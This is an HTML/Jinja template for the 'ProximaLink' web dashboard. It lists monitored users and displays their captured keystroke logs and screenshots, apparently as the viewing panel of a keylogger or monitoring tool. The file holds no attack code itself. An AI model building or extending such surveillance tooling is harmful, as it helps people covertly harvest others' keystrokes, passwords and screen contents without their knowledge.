<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>ProximaLink Dashboard</title>
    <link
      rel="stylesheet"
      href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"
    />
    <link
      rel="stylesheet"
      href="{{ url_for('static', filename='styles.css') }}"
    />
  </head>
  <body class="bg-dark text-white">
    <header class="bg-primary text-white text-center py-3">
      <h1>ProximaLink Dashboard</h1>
      <p>Welcome to the monitoring dashboard.</p>
    </header>
    <div class="container-fluid">
      <div class="row">
        <aside class="col-md-2 bg-light text-dark py-3">
          <h2>Users</h2>
          <ul class="list-unstyled">
            {% if unique_users %} {% for user in unique_users %}
            <li class="user-item">{{ user }}</li>
            {% endfor %} {% else %}
            <p>No users found yet.</p>
            {% endif %}
          </ul>
        </aside>
        <main class="col-md-10 py-3">
          <div class="d-flex justify-content-between mb-3">
            <button id="toggleKeylogs" class="btn btn-primary">Keylogs</button>
            <button id="toggleScreenshots" class="btn btn-secondary">
              Screenshots
            </button>
          </div>
          <div id="keylogsSection">
            {% if all_logs %}
            <div class="row row-data">
              {% for log in all_logs %}
              <div class="col-md-8 log-entry my-2 p-2 border rounded">
                <p>{{ log.text }}</p>
                <p class="timestamp text-left">{{ log.timestamp }}</p>
              </div>
              {% endfor %}
            </div>
            {% else %}
            <div class="alert alert-info text-center" role="alert">
              No logs found yet. Monitor activity for data to appear.
            </div>
            {% endif %}
          </div>
          <div id="screenshotsSection" style="display: none">
            <div class="row">
              {% for screenshot in screenshots %}
              <div class="col-md-4 mb-4">
                <img
                  src="http://localhost:8000/{{ screenshot.image_path }}"
                  alt="Screenshot"
                  class="img-thumbnail"
                  data-image="http://localhost:8000/{{ screenshot.image_path }}"
                  data-toggle="modal"
                  data-target="#overlayModal"
                />
              </div>
              {% endfor %}
            </div>
          </div>
        </main>
      </div>
    </div>
    <footer class="bg-primary text-white text-center py-3 mt-3">
      <p>ProximaLink Monitoring &copy; 2024</p>
    </footer>
    <div
      class="modal fade"
      id="overlayModal"
      tabindex="-1"
      role="dialog"
      aria-labelledby="overlayModalLabel"
      aria-hidden="true"
    >
      <div class="modal-dialog modal-dialog-centered modal-lg" role="document">
        <div class="modal-content bg-dark">
          <div class="modal-header">
            <h5 class="modal-title" id="overlayModalLabel">Screenshot</h5>
            <button
              type="button"
              class="close"
              data-dismiss="modal"
              aria-label="Close"
            >
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
          <div class="modal-body">
            <img id="overlayImage" src="" alt="Screenshot" class="img-fluid" />
          </div>
          <div class="modal-footer">
            <button
              type="button"
              class="btn btn-secondary"
              data-dismiss="modal"
            >
              Close
            </button>
          </div>
        </div>
      </div>
    </div>
    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.3/dist/umd/popper.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script src="{{ url_for('static', filename='scripts.js') }}"></script>
  </body>
</html>
